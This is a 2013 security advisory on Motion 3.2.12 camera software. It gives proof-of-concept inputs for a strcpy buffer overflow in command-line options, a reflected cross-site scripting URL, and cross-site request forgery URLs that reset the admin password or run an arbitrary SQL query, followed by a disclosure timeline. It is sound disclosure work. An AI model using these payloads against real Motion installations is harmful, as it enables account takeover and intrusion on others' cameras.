`Title: Motion 3.2.12 Multiple Vulnerabilities
Author: xistence - xistence[at]0x90[.]nl
Date: 26/06/2013
Vendor page: http://www.lavrsen.dk/foswiki/bin/view/Motion
Software link: http://www.lavrsen.dk/foswiki/bin/view/Motion/DownloadFiles
Software description: Motion is a program that monitors the video signal
from cameras. It is able to detect if a significant part of the picture has
changed; in other words, it can detect motion.
Tested on: Kali
Motion 3.2.12 is prone to multiple vulnerabilities. These vulnerabilities
are Buffer Overflows, Cross Site Scripting and Cross Site Request Forgery.
(0x01) - Buffer Overflows:
Supplying a long filename to the config and pid parameters of the "motion"
binary will result in a buffer overflow. The cause is the unsafe C function
strcpy(), which does no boundary checking to prevent overflowing the
buffer.
This in theory could be abused to escalate privileges if the suid/sgid flag
is set on the motion binary (not default on most operating systems as far
as I know).
Below is how to replicate the bugs:
1)
# motion -c `python -c 'print "\x41"*1000'`
[0] Configfile
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
not fou:
Segmentation fault
2)
# motion -p /tmp/`python -c 'print "\x41"*5000'`
Segmentation fault
(0x02) - Cross Site Scripting:
It's possible to execute script code on the client-side browser through the
"process_id_file" parameter.
The following Proof of Concept url will display a popup with the text XSS:
http://<IP>:<PORT>/0/config/set?process_id_file=</li><script>alert('XSS');</script><li>
(0x03) - Cross Site Request Forgery:
The following URLs show that it's possible to reset a password or change
the SQL query by sending a complete URL to the victim. If the victim clicks
on the URL, it will execute the command without any further checking.
http://<IP>:<PORT>/0/config/set?control_authentication=admin:mypassword
(Set admin password)
http://<IP>:<PORT>/0/config/set?sql_query=SELECT%20user()
(Arbitrary SQL query)
07 Mar 2013: Discovered vulnerabilities
07 Mar 2013: Filed bug report at
http://www.lavrsen.dk/foswiki/bin/view/Motion/BugReport2013x03x07x071831
26 Jun 2013: No contact or updates whatsoever from developer, public release
`